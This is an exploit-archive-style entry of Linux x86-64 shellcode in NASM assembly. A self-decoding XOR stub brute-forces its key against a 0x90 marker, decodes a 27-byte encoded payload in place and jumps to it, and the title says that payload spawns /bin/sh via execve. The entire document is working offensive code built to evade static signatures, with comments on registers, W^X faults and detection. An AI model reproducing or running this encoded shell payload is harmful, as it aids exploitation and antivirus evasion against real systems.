Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode

2017-12-16 16:05:15

; Linux x86-64 self-decoding XOR stub (NASM, Intel syntax), raw shellcode:
; no prologue, no calling convention, not C-callable.
; Flow: jmp/call/pop recovers the address of `encoded` (the 27 bytes that
; follow the `call`), the single-byte XOR key is derived by trial against a
; known marker rather than being stored in the blob, the bytes are XORed in
; place, and control jumps to them.
; Because it rewrites its own bytes, it only runs from memory that is both
; writable and executable; under W^X/NX enforcement the in-place xor faults.
; Detection note: the key never appears in the encoded bytes, so a static
; signature has to match the decoder stub itself (the cmp 0x90 / jne loop and
; the in-place xor), or the behaviour has to be caught at runtime.
;
; Register roles:
;   rdi  &encoded, then the key counter, then the decode cursor
;   rbx  &encoded, kept across the key search and the decode loop
;   dl   first encoded byte
;   al   trial decode of dl; after the search, the recovered key
;   rcx  remaining byte count for the decode loop
global _start

section .text

_start:
jmp find_address ; jmp short by default; the `call` at find_address pushes &encoded
decoder:
; Get the address of the string
pop rdi          ; rdi = return address of `call decoder` = &encoded
push rdi
pop rbx          ; rbx = &encoded (copy that survives the key search)

; get the first byte and bruteforce till you get the token 0x90
mov byte dl, [rdi]   ; dl = encoded[0]
xor rdi,rdi ; key that will be incremented from 0x00 to 0xff (only dil is used)
bruteforce:
inc rdi          ; first candidate is 1; key 0 is never tried
mov al,dl
xor al,dil       ; al = encoded[0] ^ candidate key
cmp al,0x90      ; marker: the first byte must decode to 0x90 (a NOP)
jne bruteforce   ; with encoded[0] = 0x23 this stops at 0x23 ^ 0x90 = 0xb3;
                 ; if encoded[0] were already 0x90 no nonzero key matches
                 ; and this loop never exits

push 27 ; shellcode length (given by encoder); matches the 27 bytes at `encoded`
pop rcx
mov al,dil       ; al = recovered key
push rbx
pop rdi          ; rdi = &encoded, decode cursor
decode:
xor byte [rdi], al   ; in-place decode of .text bytes; needs a writable code page
inc rdi
loop decode      ; rcx counts the 27 bytes down (legacy `loop`: size over speed)

jmp rbx ; jmp to decoded shellcode; first decoded byte is the 0x90 marker (executes
        ; as a NOP), then the execve(/bin/sh) payload named in the title (not verified here)

find_address:
call decoder     ; pushes &encoded as the return address; decoder never returns here
encoded db 0x23,0xd9,0x88,0xeb,0x2a,0xe1,0xfb,0x08,0x9c,0x9c,0xd1,0xda,0xdd,0x9c,0xc0,0xdb,0xe0,0xe7,0xec,0xe1,0xe7,0xed,0xe4,0xe7,0xe9,0xbc,0xb6 ; 27 bytes; key not stored, only the marker
